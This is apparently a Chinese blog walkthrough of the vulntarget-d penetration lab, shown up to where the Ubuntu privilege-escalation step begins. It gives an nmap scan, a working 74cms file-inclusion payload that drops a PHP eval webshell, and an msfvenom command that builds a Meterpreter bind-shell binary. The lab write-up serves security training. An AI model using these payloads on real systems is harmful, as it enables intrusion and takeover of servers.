渗透靶场——vulntarget-d综合靶场

本文详细介绍了渗透靶场vulntarget-d的全过程,包括部署环境、信息收集、Web渗透、多种操作系统提权、内网扫描、利用phpmyadmin日志getshell等环节,最终实现完整渗透。
摘要由CSDN通过智能技术生成

部署环境

此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。
在这里插入图片描述

信息收集

扫描主机
扫描同一网段中的存活主机
在这里插入图片描述发现存活主机ip地址(其他ip是我其他机器的ip地址)

192.168.1.17

扫描端口

扫描一下存活靶机的ip地址

nmap -A -p- 192.168.1.17

在这里插入图片描述发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看
访问80端口发现不可
在这里插入图片描述

web渗透

访问81端口
在这里发现了一个骑士的cms框架界面
在这里插入图片描述看到底下的版本信息,搜索一下看看这个版本有没有什么版本漏洞进行利用
在这里插入图片描述直接搜索这个版本漏洞
在这里插入图片描述发现实存在文件包含漏洞的,那就直接利用这个漏洞进行渗透即可
查看http://192.168.1.17:81/,通过搜集信息可知,可能存在74cms文件包含漏洞:
然后继续执行:

http://192.168.1.17:81/index.php?m=home&a=assign_resume_tpl

post执行

variable=1&tpl=<?php fputs(fopen("tx.php","w"),"<?php eval($_POST[123123]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名=“info” 企业id="$_GET[‘id’]"/>

在这里插入图片描述开始包含

http://192.168.1.17:81/index.php?m=home&a=assign_resume_tpl

post部分(注意包含的时候,要对应日期)

variable=1&tpl=data/Runtime/Logs/Home/22_03_30.log

在这里插入图片描述在这里要切记 “shell.php会被被拦截,要避免!

然后就直接上蚁剑链接就行

在这里插入图片描述已经成功链接
在这里插入图片描述在这里插入图片描述

Ubuntu提权

首先先上线MSF,生成一个木马文件,好给Ubuntu虚拟机传上

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf >0330.elf

在这里插入图片描述
通过蚁剑上传上去之后,赋予执行权限,运行:
在这里插入图片描述

  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TJA小傲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值